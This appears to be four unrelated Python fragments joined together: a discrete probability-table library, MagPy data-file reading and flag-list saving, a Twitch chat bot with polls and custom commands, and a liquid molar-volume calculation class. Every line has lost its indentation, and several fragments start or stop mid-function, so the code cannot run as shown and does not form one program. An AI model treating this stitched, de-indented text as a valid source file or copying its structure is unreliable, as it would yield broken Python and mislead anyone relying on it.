if separator_index == []:
query = args
else:
separator_index = separator_index[0][0]
query = args[0:separator_index] + [args[separator_index][0]]
given = [args[separator_index][1]] + args[separator_index+1:]
return Query(query, given)
################################################################################
# Discrete random variables
################################################################################
class Variable():
def __init__(self, name, values=(True, False), description=''):
self.name = name
self.description = name if description == '' else description
self.values = values
self.assignments = tuple(self<<value for value in self.values)
if None in self.values:
raise ValueError('Cannot use None as a value. None is reserved for missing data.')
def __len__(self):
return len(self.values)
def __getitem__(self, key):
return self.assignments[key]
def __iter__(self):
return iter(self.assignments)
def __str__(self):
return self.name
def __repr__(self):
return str(self)
def column_width(self):
return max(len(str(self)), max(*[len(str(value)) for value in self.values]))
def __lt__(self, other):
if isinstance(other, Variable):
return DirectedEdge(other, self)
raise ValueError('Expecting Variable.')
def __gt__(self, other):
if isinstance(other, Variable):
return DirectedEdge(self, other)
raise ValueError('Expecting Variable.')
def __or__(self, other):
return (self, other)
def __lshift__(self, other):
if other not in self.values:
raise ValueError('Assigned value is not valid for this variable: {:} not in {:}.'.format(other, self.values))
return SingleAssignment(self, other)
BaseAssignment = namedtuple('BaseAssignment', ['variable', 'value'])
class SingleAssignment(BaseAssignment):
def __init__(self, variable, value):
super(SingleAssignment, self).__init__(variable, value)
if not value in variable.values:
raise ValueError('Assigned incompatible value to variable. Value {1} not in {2} for variable {0}.'.format(variable, value, str(variable.values)))
def __str__(self):
return '{!s}={!s}'.format(self.variable, self.value)
def __repr__(self):
return str(self)
def __or__(self, other):
return (self, other)
class Assignment(frozenset):
def __new__(_cls, single_assignments):
if isinstance(single_assignments, SingleAssignment):
return frozenset.__new__(_cls, [single_assignments])
else:
if len(filter(lambda x: not isinstance(x, SingleAssignment), single_assignments)) > 0:
raise ValueError('Assignments can only be made from SingleAssignments.')
return frozenset.__new__(_cls, single_assignments)
def __str__(self):
return '({:})'.format(', '.join([str(x) for x in self]))
def __repr__(self):
return str(self)
def consistent_with(self, other):
return len(self.union(other)) == len(self.union(other).get_variables())
def project(self, variables):
return Assignment(filter(lambda x: x.variable in variables, self))
def get_variable(self, variable):
return filter(lambda x: x.variable == variable, self)[0]
def get_variables(self):
return frozenset([x.variable for x in self])
def ordered(self, order):
return tuple(self.get_variable(variable) for variable in order)
def ordered_values(self, order):
return tuple(self.get_variable(variable).value for variable in order)
def complete(self, variables):
return Assignment.generate(set(variables).difference(self.get_variables()), list(self))
def complete_partials(self, variables):
return Assignment.generate(set(variables).difference(self.get_variables()), [])
@staticmethod
def generate(variables, trace=[]):
variables = list(variables)
if len(variables) == 0:
return [Assignment(trace)]
else:
variable, rest = variables[0], variables[1:]
traces = []
for value in variable.values:
traces.extend(Assignment.generate(rest, trace+[SingleAssignment(variable, value)]))
return traces
Assignment.empty = Assignment(())
################################################################################
# Number systems
################################################################################
float_number_system = (0.0, 1.0, float)
decimal_number_system = (Decimal('0'), Decimal('1'), Decimal)
try:
from sympy import S
sympy_number_system = (S('0'), S('1'), S)
sympy_float_number_system = (S('0.0'), S('1.0'), S)
except ImportError:
pass
################################################################################
# Discrete probability tables
################################################################################
# TODO: These tables should really be numeric arrays with a function to
# transform Assignments to indices.
# TODO: All of these if statements to perform a different operation depending
# on whether the table is marginal or not might be best done by simply
# reassigning the methods on initialization since a table cannot change its own
# type.
class Table():
def __init__(self, variables, context_variables=(), context='', ignore_validity=False, number_system=float_number_system):
self.variables = frozenset(variables)
self.context_variables = frozenset(context_variables)
self.all_variables = self.variables.union(self.context_variables)
self.context = context
if self.context == '':
self.context = str(tuple(self.context_variables))[1:-1]
self.ignore_validity = ignore_validity
self.set_number_system(number_system)
if len(self.variables.intersection(self.context_variables)) > 0:
raise ValueError('Context variables and table variables cannot overlap: {:} exists in both {:} and {:}.'.format(self.variables.intersection(self.context_variables), self.variables, self.context_variables))
self.is_conditional_table = len(self.context_variables) > 0
self.is_marginal_table = len(self.context_variables) == 0
self.assignments = Assignment.generate(self.variables)
self.context_assignments = Assignment.generate(self.context_variables)
self.all_assignments = Assignment.generate(self.variables.union(self.context_variables))
self._entries = {}
if self.is_marginal_table:
for assignment in self.assignments:
self._entries[assignment] = None
else:
for context_assignment in self.context_assignments:
self._entries[context_assignment] = Table(self.variables, (), str(context_assignment)[1:-1], ignore_validity=self.ignore_validity, number_system=self.number_system)
# REPRESENTATIONS
def __str__(self):
context_column_widths = [variable.column_width() for variable in self.context_variables]
column_widths = [variable.column_width() for variable in self.variables]
if self.is_marginal_table:
out_string = '{:} | P({:}{:})\n'.format(
' | '.join([str(variable).ljust(column_widths[i]) for i, variable in enumerate(self.variables)]),
','.join([str(variable) for variable in self.variables]),
'|{:}'.format(self.context) if not self.context == '' else '')
out_string += '-'*len(out_string) + '\n'
for assignment in self.assignments:
for i, variable in enumerate(self.variables):
out_string += str(assignment.get_variable(variable).value).ljust(column_widths[i]) + ' | '
out_string += '{:}\n'.format(self._entries[assignment])
else:
out_string = '{:} || {:} | P({:}|{:})\n'.format(' | '.join([str(variable).ljust(context_column_widths[i]) for i, variable in enumerate(self.context_variables)]), ' | '.join([str(variable).ljust(column_widths[i]) for i, variable in enumerate(self.variables)]), ','.join([str(variable) for variable in self.variables]), ','.join([str(variable) for variable in self.context_variables]))
out_string += '-'*len(out_string) + '\n'
for context_assignment in self.context_assignments:
context_table = self._entries[context_assignment]
for assignment in context_table.assignments:
out_string += ' | '.join([str(context_assignment.get_variable(variable).value).ljust(context_column_widths[i]) for i, variable in enumerate(self.context_variables)])
out_string += ' || '
out_string += ' | '.join([str(assignment.get_variable(variable).value).ljust(column_widths[i]) for i, variable in enumerate(self.variables)])
out_string += ' | '
out_string += '{:}\n'.format(context_table[assignment])
return out_string[:-1]
def __repr__(self):
return str(self)
# BASIC OPERATIONS
def __getitem__(self, key):
key = Assignment(key)
assignment = key.project(self.variables)
context_assignment = key.project(self.context_variables)
if self.is_marginal_table:
return self._entries[assignment]
else:
return self._entries[context_assignment][assignment]
def __setitem__(self, key, value):
key = Assignment(key)
assignment = key.project(self.variables)
context_assignment = key.project(self.context_variables)
if self.is_marginal_table:
self._entries[assignment] = value
else:
self._entries[context_assignment][assignment] = value
def get_number_system(self):
return self.zero, self.one, self.make_number
def set_number_system(self, value):
self.zero, self.one, self.make_number = value
number_system = property(get_number_system, set_number_system)
def total_probability(self):
if not self.is_marginal_table:
raise ValueError('Operation only valid for marginal tables.')
return sum(self._entries.values())
def get_is_valid(self, epsilon=0.0000000000000004):
if self.is_marginal_table:
if None in self._entries.values():
return False
if epsilon == 0 or self.make_number != float:
if not self.total_probability() == self.one:
return False
else:
if abs(self.one - self.total_probability()) > epsilon:
return False
else:
for context_assignment in self.context_assignments:
if not self._entries[context_assignment].is_valid:
return False
return True
is_valid = property(get_is_valid)
def copy(self, other):
'''
Copies the entries from another table. This requires that the other
table share the same variables as this one.
Raises a KeyError if the tables do not share the same variables.
'''
if not self.variables == other.variables and self.context_variables == other.context_variables:
raise KeyError('Cannot copy from table that does not have the same variables.')
if self.is_marginal_table:
for assignment in self.assignments:
self._entries[assignment] = other._entries[assignment]
else:
for context_assignment in self.context_assignments:
self._entries[context_assignment].copy(other._entries[context_assignment])
return self
def randomize(self):
'''
Randomizes the table entries.
If the table is a marginal table then it assigns a random value from a
uniform distribution in [0, 1] to each entry and then normalizes the
table.
If the table is a conditional table then it simply calls randomize on
all context tables.
The function returns the instance.
'''
if self.is_marginal_table:
for assignment in self.assignments:
self._entries[assignment] = random()
else:
for context_assignment in self.context_assignments:
self._entries[context_assignment].randomize()
self.normalize()
return self
def normalize(self):
'''
Normalizes the table.
If the table is a marginal table then it simply calculates the total
probablity and divides all entries by the total probability.
If the table is a conditional table then it simply calls normalize on
all context tables.
The function returns the instance.
'''
if self.is_marginal_table:
normalizer = self.total_probability()
for assignment in self.assignments:
self._entries[assignment] /= normalizer
else:
for context_assignment in self.context_assignments:
self._entries[context_assignment].normalize()
return self
def normalize_number_system(self):
if self.is_marginal_table:
for assignment in self.assignments:
self._entries[assignment] = self.make_number(self._entries[assignment])
else:
for context_assignment in self.context_assignments:
self._entries[context_assignment].normalize()
return self
# BASIC PROBABILISTIC OPERATIONS
def marginalize_out(self, variables):
if not self.is_marginal_table:
| |
not be read. Skipping ...".format(filename))
if (len(stp) > 0 and not np.isnan(stp[0].time)) or len(stp.ndarray[0]) > 0: # important - otherwise header is going to be deleted
st.extend(stp.container,stp.header,stp.ndarray)
#del stp
if st.length()[0] == 0:
# try to give more specific information why the stream is empty
if has_magic(pathname) and not glob(pathname):
logger.error("read: No file matching file pattern: %s" % pathname)
raise Exception("Cannot read non-existent file!")
elif not has_magic(pathname) and not os.path.isfile(pathname):
logger.error("read: No such file or directory: %s" % pathname)
raise Exception("Cannot read non-existent file!")
# Only raise error if no starttime/endtime has been set. This
# will return an empty stream if the user chose a time window with
# no data in it.
# XXX: Might cause problems if the data is faulty and the user
# set starttime/endtime. Not sure what to do in this case.
elif not 'starttime' in kwargs and not 'endtime' in kwargs:
logger.error("read: Cannot open file/files: %s" % pathname)
elif 'starttime' in kwargs or 'endtime' in kwargs:
logger.error("read: Cannot read data. Probably no data available in the time range provided!")
raise Exception("No data available in time range")
else:
logger.error("read: Unknown error occurred. No data in stream!")
raise Exception("Unknown error occurred during reading. No data in stream!")
if headonly and (starttime or endtime):
msg = "read: Keyword headonly cannot be combined with starttime or endtime."
logger.error(msg)
# Sort the input data regarding time
if not skipsorting:
st = st.sorting()
# eventually trim data
if starttime:
st = st.trim(starttime=starttime)
if endtime:
st = st.trim(endtime=endtime)
### Define some general header information TODO - This is done already in some format libs - clean up
st.header['DataSamplingRate'] = float("{0:.2f}".format(st.samplingrate()))
return st
#@uncompressFile
def _read(filename, dataformat=None, headonly=False, **kwargs):
"""
Reads a single file into a MagPy DataStream object.
Internal function only.
"""
debug = kwargs.get('debug')
stream = DataStream([],{})
format_type = None
foundapproptiate = False
if not dataformat:
# auto detect format - go through all known formats in given sort order
for format_type in PYMAG_SUPPORTED_FORMATS:
# check format
if debug:
print("_read: Testing format: {} ...".format(format_type))
if debug:
logger.info("_read: Testing format: {} ...".format(format_type))
#try:
# readsucc = isFormat(filename, format_type)
#except:
# readsucc = False
if isFormat(filename, format_type):
if debug:
logger.info(" -- found: {}".format(format_type))
print (" -- found: {}".format(format_type))
foundapproptiate = True
break
if not foundapproptiate:
temp = open(filename, 'rt').readline()
if temp.startswith('# MagPy Absolutes'):
logger.warning("_read: You apparently tried to open a DI object - please use the absoluteAnalysis method")
else:
logger.error("_read: Could not identify a suitable data format")
return DataStream([LineStruct()],{},np.asarray([[] for el in KEYLIST]))
else:
# format given via argument
dataformat = dataformat.upper()
try:
formats = [el for el in PYMAG_SUPPORTED_FORMATS if el == dataformat]
format_type = formats[0]
except IndexError:
msg = "Format \"%s\" is not supported. Supported types: %s"
logger.error(msg % (dataformat, ', '.join(PYMAG_SUPPORTED_FORMATS)))
raise TypeError(msg % (dataformat, ', '.join(PYMAG_SUPPORTED_FORMATS)))
"""
try:
# search readFormat for given entry point
readFormat = load_entry_point(format_ep.dist.key,
'obspy.plugin.waveform.%s' % (format_ep.name), 'readFormat')
except ImportError:
msg = "Format \"%s\" is not supported. Supported types: %s"
raise TypeError(msg % (format_ep.name,
', '.join(WAVEFORM_ENTRY_POINTS)))
"""
stream = readFormat(filename, format_type, headonly=headonly, **kwargs)
return stream
def saveflags(mylist=None,path=None, overwrite=False):
"""
DEFINITION:
Save list e.g. flaglist to file using pickle.
PARAMETERS:
Variables:
- path: (str) Path to data files in form:
RETURNS:
- True if succesful otherwise False
EXAMPLE:
>>> saveflags(flaglist,'/my/path/myfile.pkl')
"""
print("Saving flaglist ...")
if not mylist:
print("error 1")
return False
if not path:
path = 'myfile.pkl'
if not overwrite:
existflag = loadflags(path)
existflag.extend(mylist)
mylist = existflag
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
if path.endswith('.json'):
print(" -- using json format ")
try:
import json
def dateconv(d):
# Converter to serialize datetime objects in json
if isinstance(d,datetime):
return d.__str__()
# Convert mylist to a dictionary
mydic = {}
# get a list of unique sensorid
sid = [elem[5] for elem in mylist]
sid = list(set(sid))
for s in sid:
slist = [elem[0:5]+elem[6:] for elem in mylist if elem[5] == s]
mydic[s] = slist
## Dictionary looks like {SensorID:[[t1,t2,xxx,xxx,],[x...]]}
with open(path,'w',encoding='utf-8') as file:
file.write(unicode(json.dumps(mydic,default=dateconv)))
print("saveflags: list saved to a json file: {}".format(path))
return True
except:
return False
else:
print(" -- using pickle")
try:
# TODO: check whether package is already loaded
from pickle import dump
dump(mylist,open(path,'wb'))
print("saveflags: list saved to {}".format(path))
return True
except:
return False
def loadflags(path=None,sensorid=None,begin=None, end=None):
"""
DEFINITION:
Load list e.g. flaglist from file using pickle.
PARAMETERS:
Variables:
- path: (str) Path to data files in form:
- begin: (datetime)
- end: (datetime)
RETURNS:
- list (e.g. flaglist)
EXAMPLE:
>>> loadflags('/my/path/myfile.pkl')
"""
if not path:
return []
if path.endswith('.json'):
try:
import json
print ("Reading a json style flaglist...")
def dateparser(dct):
# Convert dates in dictionary to datetime objects
for (key,value) in dct.items():
for i,line in enumerate(value):
for j,elem in enumerate(line):
if str(elem).count('-') + str(elem).count(':') == 4:
try:
try:
value[i][j] = datetime.strptime(elem,"%Y-%m-%d %H:%M:%S.%f")
except:
value[i][j] = datetime.strptime(elem,"%Y-%m-%d %H:%M:%S")
except:
pass
dct[key] = value
return dct
if os.path.isfile(path):
with open(path,'r') as file:
mydic = json.load(file,object_hook=dateparser)
if sensorid:
mylist = mydic.get(sensorid,'')
do = [el.insert(5,sensorid) for el in mylist]
else:
mylist = []
for s in mydic:
ml = mydic[s]
do = [el.insert(5,s) for el in ml]
mylist.extend(mydic[s])
if begin:
mylist = [el for el in mylist if el[1] > begin]
if end:
mylist = [el for el in mylist if el[0] < end]
return mylist
else:
print ("Flagfile not yet existing ...")
return []
except:
return []
else:
try:
from pickle import load as pklload
mylist = pklload(open(path,"rb"))
print("loadflags: list {a} successfully loaded, found {b} inputs".format(a=path,b=len(mylist)))
if sensorid:
print(" - extracting data for sensor {}".format(sensorid))
mylist = [el for el in mylist if el[5] == sensorid]
if begin:
mylist = [el for el in mylist if el[1] > begin]
if end:
mylist = [el for el in mylist if el[0] < end]
#print(" -> remaining flags: {b}".format(b=len(mylist)))
return mylist
except:
return []
def joinStreams(stream_a,stream_b, **kwargs):
"""
DEFINITION:
Copy two streams together eventually replacing already existing time steps.
Data of stream_a will replace data of stream_b
APPLICATION
combinedstream = joinStreams(stream_a,stream_b)
"""
logger.info('joinStreams: Start joining at %s.' % str(datetime.now()))
# Check stream type and eventually convert them to ndarrays
# --------------------------------------
ndtype = False
if len(stream_a.ndarray[0]) > 0:
# Using ndarray and eventually convert stream_b to ndarray as well
ndtype = True
if not len(stream_b.ndarray[0]) > 0:
stream_b = stream_b.linestruct2ndarray()
if not len(stream_b.ndarray[0]) > 0:
return stream_a
elif len(stream_b.ndarray[0]) > 0:
ndtype = True
stream_a = stream_a.linestruct2ndarray()
if not len(stream_a.ndarray[0]) > 0:
return stream_b
else:
ndtype = True
stream_a = stream_a.linestruct2ndarray()
stream_b = stream_b.linestruct2ndarray()
if not len(stream_a.ndarray[0]) > 0 and not len(stream_b.ndarray[0]) > 0:
logger.error('subtractStreams: stream(s) empty - aborting subtraction.')
return stream_a
# non-destructive
# --------------------------------------
sa = stream_a.copy()
sb = stream_b.copy()
# Get indicies of timesteps of stream_b of which identical times are existing in stream_a-> delelte those lines
# --------------------------------------
# IMPORTANT: If two streams with different keys should be combined then "merge" is the method of choice
# NEW: shape problems when removing data -> now use removeduplicates at the end
# SHOULD WORK (already tested) as remove duplicate will keep the last value and drop earlier occurences
#indofb = np.nonzero(np.in1d(sb.ndarray[0], sa.ndarray[0]))[0]
#for idx,elem in enumerate(sb.ndarray):
# if len(sb.ndarray[idx]) > 0:
# sb.ndarray[idx] = np.delete(sb.ndarray[idx],indofb)
# Now add stream_a to stream_b - regard for eventually missing column data
# --------------------------------------
array = [[] for key in KEYLIST]
for idx,elem in enumerate(sb.ndarray):
if len(sa.ndarray[idx]) > 0 and len(sb.ndarray[idx]) > 0:
array[idx] = np.concatenate((sa.ndarray[idx],sb.ndarray[idx]))
elif not len(sa.ndarray[idx]) > 0 and len(sb.ndarray[idx]) > 0:
if idx < len(NUMKEYLIST):
fill = float('nan')
else:
fill = '-'
arraya = np.asarray([fill]*len(sa.ndarray[0]))
array[idx] = np.concatenate((arraya,sb.ndarray[idx]))
elif len(sa.ndarray[idx]) > 0 and not len(sb.ndarray[idx]) > 0:
if idx < len(NUMKEYLIST):
fill = float('nan')
else:
fill = '-'
arrayb = np.asarray([fill]*len(sb.ndarray[0]))
array[idx] = np.concatenate((sa.ndarray[idx],arrayb))
else:
array[idx] = np.asarray([])
stream = DataStream([LineStruct()],sa.header,np.asarray(array,dtype=object))
stream = stream.removeduplicates()
return stream.sorting()
def appendStreams(streamlist):
"""
DESCRIPTION:
Appends contents of streamlist and returns a single new stream.
Duplicates are | |
= {
"reviewed": 1 if c_msg["sender"] == self.channel else 0,
"text": text,
}
cookies = {"session": self.session}
success = requests.post(url, data=data, cookies=cookies)
try:
success.raise_for_status()
reviewed = "to the database" if c_msg["sender"] == self.channel else "for review"
response = "Your {} has been added {}.".format(text_type, reviewed)
except Exception:
traceback.print_exc(limit=2)
response = "I had problems adding this to the database."
self.twitch_send_message(response, "!add" + text_type)
def text_retrieve(self, text_type):
#Pull a random pun/quote from the database
#Will not pull the same one twice in a row
text_type_plural = text_type + 's'
url = "https://leagueofnewbs.com/api/users/{}/{}?limit=2".format(self.channel, text_type_plural)
text_lines = self.api_caller(url)
if text_lines:
try:
if text_lines[text_type_plural][0]["text"] != self.last_text[text_type]:
response = text_lines[text_type_plural][0]["text"]
else:
try:
response = text_lines[text_type_plural][1]["text"]
except IndexError:
response = text_lines[text_type_plural][0]["text"]
except IndexError:
response = "Please insert {} into the database before using this command.".format(text_type_plural)
else:
response = "There was a problem retrieving {}.".format(text_type_plural)
self.twitch_send_message(response, '!' + text_type)
self.last_text[text_type] = response
def srl_race_retrieve(self):
#Goes through all races, finds the race the user is in, gathers all other users in the race, prints the game, the
#category people are racing, the time racebot has, and either a multitwitch link or a SRL race room link
srl_nick = self.config_data["srl_nick"]
url = 'http://api.speedrunslive.com/races'
data_decode = self.api_caller(url)
if data_decode == False:
return
data_races = data_decode['races']
srl_race_entrants = []
for i in data_races:
if self.channel in [x["twitch"].lower() for x in i["entrants"].values()] or srl_nick in [x.lower() for x in i["entrants"]]:
race_channel = i
for k, v in race_channel["entrants"].iteritems():
if srl_nick == k.lower() or self.channel == v["twitch"].lower():
user_nick = k
for values in race_channel['entrants'].values():
if values['statetext'] == 'Ready' or values['statetext'] == 'Entered':
if values['twitch'] != '':
srl_race_entrants.append(values['twitch'].lower())
user_place = race_channel['entrants'][user_nick]['place']
user_time = race_channel['entrants'][user_nick]['time']
srl_race_status = race_channel['statetext']
srl_race_time = race_channel['time']
srl_race_link = 'http://www.speedrunslive.com/race/?id={}'.format(race_channel['id'])
srl_live_entrants = []
live_decoded = self.api_caller('https://api.twitch.tv/kraken/streams?channel=' + ','.join(srl_race_entrants))
for j in live_decoded['streams']:
srl_live_entrants.append(j['channel']['name'])
response = 'Game: {}, Category: {}, Status: {}'.format(race_channel['game']['name'], race_channel['goal'], srl_race_status)
if srl_race_time > 0:
if user_time > 0:
time_formatted = self.format_sr_time(user_time)
position_suffix = str(self.get_number_suffix(user_place))
response += ', Finished {}{} with a time of {}'.format(user_place, position_suffix, time_formatted)
else:
real_time = (int(time.time()) - srl_race_time)
time_formatted = self.format_sr_time(real_time)
response += ', RaceBot Time: {}'.format(time_formatted)
live_length = len(srl_live_entrants)
if srl_race_status == 'Complete':
response += '. {}'.format(srl_race_link)
elif live_length <= 6 and live_length > 1:
multitwitch_link = "http://kadgar.net/live/" + '/'.join(srl_live_entrants)
response += '. {}'.format(multitwitch_link)
else:
response += '. {}'.format(srl_race_link)
self.twitch_send_message(response, '!race')
return
def youtube_video_check(self, c_msg):
#Links the title and uploader of the youtube video in chat
video_ids = re.findall("(?:youtube(?:-nocookie)?\.com\/(?:[^\/\n\s]+\/\S+\/|(?:v|e(?:mbed)?)\/|\S*?[?&]v=)|youtu\.be\/)([a-zA-Z0-9_-]{11})", c_msg["message"])
if not video_ids:
return
else:
seen_ids = set()
seen_add = seen_ids.add
video_ids = [x for x in video_ids if not (x in seen_ids or seen_add(x))]
final_list = []
for i in video_ids:
url = 'https://www.googleapis.com/youtube/v3/videos?part=snippet,statistics,contentDetails&id={}&key={}'.format(i, youtube_api_key)
data_decode = self.api_caller(url)
if data_decode == False:
return
if len(data_decode['items']) != 0:
data_items = data_decode['items']
video_title = data_items[0]['snippet']['title'].encode("utf-8")
uploader = data_items[0]['snippet']['channelTitle'].encode("utf-8")
view_count = data_items[0]['statistics']['viewCount']
duration = isodate.parse_duration(data_items[0]["contentDetails"]["duration"])
duration_string = self.format_sr_time(duration.seconds)
final_list.append("[{}] {} uploaded by {}. Views: {}".format(duration_string, video_title, uploader, view_count))
else:
continue
self.twitch_send_message(" | ".join(final_list))
return
def create_vote(self, c_msg):
#Used to create polls in chat
#Creating polls requires a pretty specific syntax, but makes it easy to have different types
if self.votes:
self.twitch_send_message('There is already an open poll, please close it first.')
return
poll_type = c_msg["message"].split(' ')[1]
try:
poll = re.findall('"(.+)"', c_msg["message"])[0]
except Exception:
self.twitch_send_message('Please give the poll a name.')
return
self.votes = { 'name' : poll,
'type' : poll_type,
'options' : {},
'voters' : {}}
if poll_type == 'strict':
options = re.findall('\((.+?)\)', c_msg["message"])
if not options:
self.twitch_send_message('You did not supply any options, poll will be closed.')
self.votes.clear()
return
for i in options:
vote_option = i.lower()
self.votes['options'][vote_option] = 0
response = 'You may now vote for this poll using only the supplied options.'
elif poll_type == 'loose':
response = 'You may now vote for this poll with whatever choice you like.'
else:
response = "Please specify a poll type."
self.votes.clear()
self.twitch_send_message(response)
def end_vote(self):
#Ending a current poll will display the winning vote of the poll and close it
if self.votes:
try:
winning_amount = max(self.votes['options'].values())
winning_keys = [key for key, value in self.votes["options"] if value == winning_amount]
if len(winning_keys) == 0:
response = ""
elif len(winning_keys) == 1:
response = "{0} has won with {1} votes.".format(winning_keys[0], winning_amount)
else:
combined_keys = ", ".join(winning_keys)
response = "{0} have all tied with {1} votes!".format(combined_keys, winning_amount)
finally:
self.votes.clear()
if response:
self.twitch_send_message(response)
def vote(self, c_msg):
#Allows viewers to vote in a poll created by mods/broadcaster
try:
sender_bet = c_msg["message"].split('vote ')[-1]
sender_bet = sender_bet.lower()
except Exception:
return
if not self.votes:
return
if self.votes['type'] == 'strict':
if sender_bet not in self.votes['options']:
self.twitch_send_message('You must vote for one of the options specified: ' + ', '.join(self.votes['options'].keys()), '!vote')
return
if c_msg["sender"] in self.votes['voters']:
if sender_bet == self.votes['voters'][c_msg["sender"]]:
response = 'You have already voted for that {}.'.format(c_msg["sender"])
else:
previous = self.votes['voters'][c_msg["sender"]]
self.votes['options'][previous] -= 1
if self.votes['options'][previous] == 0 and self.votes['type'] == 'loose':
del self.votes['options'][previous]
try:
self.votes['options'][sender_bet] += 1
except KeyError:
self.votes['options'][sender_bet] = 1
self.votes['voters'][c_msg["sender"]] = sender_bet
response = '{} has changed their vote to {}'.format(c_msg["sender"], sender_bet)
else:
try:
self.votes['options'][sender_bet] += 1
except KeyError:
self.votes['options'][sender_bet] = 1
self.votes['voters'][c_msg["sender"]] = sender_bet
response = '{} now has {} votes for it.'.format(sender_bet, str(self.votes['options'][sender_bet]))
self.twitch_send_message(response, '!vote')
def check_votes(self):
#Allows you to see what is currently winning in the current poll w/o closing it
if not self.votes:
return
response = 'Current poll: "{}". '.format(self.votes["name"])
if not self.votes['options']:
response += "No one has bet yet. "
else:
for k, v in self.votes["options"].items():
response += "{}: {}; ".format(k, v)
self.twitch_send_message(response[:-2], '!vote')
def lister(self, c_msg, s_list):
#Add user to blacklist or remove them from it
#Blacklist will cause bot to completely ignore the blacklisted user
user = c_msg["message"].split(' ')[-1]
worked = False
if s_list == 'black':
self.blacklist.append(user)
with open('blacklists/{}_blacklist.txt'.format(self.channel), 'a+') as data_file:
data_file.write(user + '\n')
worked = True
elif s_list == 'white':
if user in self.blacklist:
self.blacklist.remove(user)
with open('blacklists/{}_blacklist.txt'.format(self.channel), 'w') as data_file:
try:
data_file.write(self.blacklist)
except Exception:
pass
worked = True
if worked == True:
self.twitch_send_message('{} has been {}listed'.format(user, s_list))
def add_custom_command(self, c_msg):
user = c_msg["sender"]
msg_split = c_msg["message"].split(" ", 4)
trigger = msg_split[1]
limit = msg_split[2]
admin_bool = 1 if (msg_split[3].lower() == "true" or msg_split[3].lower() == "t") else 0
output = msg_split[4]
send_data = {
"on": 1,
"trigger": trigger,
"limit": limit,
"admin": admin_bool,
"output": output
}
url = "https://leagueofnewbs.com/api/users/{}/custom_commands".format(user)
cookies = {"session": self.session}
try:
success = requests.post(url, data=send_data, cookies=cookies)
success.raise_for_status()
response = "Command successfully created."
self.custom_commands.append("!{}".format(trigger))
self.custom_command_times["!{}".format(trigger)] = {"last": 0, "limit": limit, "output": output, "admin": admin_bool}
except Exception:
traceback.print_exc(limit=2)
response = "I had problems adding this to the database."
self.twitch_send_message(response)
def del_custom_command(self, c_msg):
user = c_msg["sender"]
msg_split = c_msg["message"].split(" ")
command = msg_split[1]
if command == "":
self.twitch_send_message("Please specify a custom command to delete: {}".format(", ".join(self.custom_commands)))
return
url = "https://leagueofnewbs.com/api/users/{}/custom_commands/{}".format(user, command)
cookies = {"session": self.session}
try:
success = requests.delete(url, cookies=cookies)
success.raise_for_status()
response = "Command successfully deleted."
self.custom_commands.remove("!{}".format(command))
del self.custom_command_times["!{}".format(command)]
except Exception:
traceback.print_exc(limit=2)
response = "I could not delete the command, please make sure you supply the trigger w/o the prefix (ie: '!') and it is a command currently in the database."
self.twitch_send_message(response)
def custom_command(self, c_msg):
#Shitty custom command implementation,
space_count = c_msg["message"].count(' ')
if space_count == 0:
command = c_msg["message"]
param = ''
else:
command = c_msg["message"].split(' ')[0]
param = c_msg["message"].split(' ')[-space_count]
command = '!' + command
if command not in self.custom_commands:
return
if c_msg["sender"] == self.channel:
pass
elif self.custom_command_times[command]["admin"] and c_msg["tags"]["user-type"] not in self.elevated_user:
return
response = self.custom_command_times[command]["output"]
response = response.replace("$sender", c_msg["sender"])
response = response.replace("$param", param)
self.twitch_send_message(response)
self.custom_command_times[command]["last"] = int(time.time())
def lol_masteries(self):
#Pull the summoners active mastery page and adds up what trees they are in
summoner_name = self.config_data['general']['summoner_name']
name_url = 'https://na.api.pvp.net/api/lol/na/v1.4/summoner/by-name/{}?api_key={}'.format(summoner_name, lol_api_key)
name_data = self.api_caller(name_url)
if name_data == False:
return
summoner_id = name_data[summoner_name]['id']
mastery_url = 'https://na.api.pvp.net/api/lol/na/v1.4/summoner/{}/masteries?api_key={}'.format(summoner_id, lol_api_key)
mastery_data = self.api_caller(mastery_url)
if mastery_data == False:
return
for i in mastery_data[str(summoner_id)]['pages']:
if i['current'] == True:
active_set = i
break
masteries_used = {'offense' : 0, 'defense': 0, 'utility' : 0}
for i in active_set['masteries']:
if str(i['id'])[1] == '1':
masteries_used['offense'] += | |
Tmins.append(0); Tmaxs.append(self.Tc)
if all((self.Tc, self.Vc, self.omega)):
methods.append(TOWNSEND_HALES)
methods.append(HTCOSTALD)
methods.append(MMSNM0)
if self.CASRN in SNM0_data.index:
methods.append(MMSNM0FIT)
self.SNM0_delta_SRK = float(SNM0_data.at[self.CASRN, 'delta_SRK'])
Tmins.append(0); Tmaxs.append(self.Tc)
if all((self.Tc, self.Vc, self.omega, self.Tb, self.MW)):
methods.append(CAMPBELL_THODOS)
Tmins.append(0); Tmaxs.append(self.Tc)
if all((self.Tc, self.Pc, self.omega)):
methods_P.append(COSTALD_COMPRESSED)
if self.eos:
methods_P.append(EOS)
if Tmins and Tmaxs:
self.Tmin, self.Tmax = min(Tmins), max(Tmaxs)
self.all_methods = set(methods)
self.all_methods_P = set(methods_P)
def calculate(self, T, method):
r'''Method to calculate low-pressure liquid molar volume at tempearture
`T` with a given method.
This method has no exception handling; see `T_dependent_property`
for that.
Parameters
----------
T : float
Temperature at which to calculate molar volume, [K]
method : str
Name of the method to use
Returns
-------
Vm : float
Molar volume of the liquid at T and a low pressure, [m^3/mol]
'''
if method == RACKETT:
Vm = Rackett(T, self.Tc, self.Pc, self.Zc)
elif method == YAMADA_GUNN:
Vm = Yamada_Gunn(T, self.Tc, self.Pc, self.omega)
elif method == BHIRUD_NORMAL:
Vm = Bhirud_normal(T, self.Tc, self.Pc, self.omega)
elif method == TOWNSEND_HALES:
Vm = Townsend_Hales(T, self.Tc, self.Vc, self.omega)
elif method == HTCOSTALD:
Vm = COSTALD(T, self.Tc, self.Vc, self.omega)
elif method == YEN_WOODS_SAT:
Vm = Yen_Woods_saturation(T, self.Tc, self.Vc, self.Zc)
elif method == MMSNM0:
Vm = SNM0(T, self.Tc, self.Vc, self.omega)
elif method == MMSNM0FIT:
Vm = SNM0(T, self.Tc, self.Vc, self.omega, self.SNM0_delta_SRK)
elif method == CAMPBELL_THODOS:
Vm = Campbell_Thodos(T, self.Tb, self.Tc, self.Pc, self.MW, self.dipole)
elif method == HTCOSTALDFIT:
Vm = COSTALD(T, self.Tc, self.COSTALD_Vchar, self.COSTALD_omega_SRK)
elif method == RACKETTFIT:
Vm = Rackett(T, self.Tc, self.Pc, self.RACKETT_Z_RA)
elif method == PERRYDIPPR:
A, B, C, D = self.DIPPR_coeffs
Vm = 1./EQ105(T, A, B, C, D)
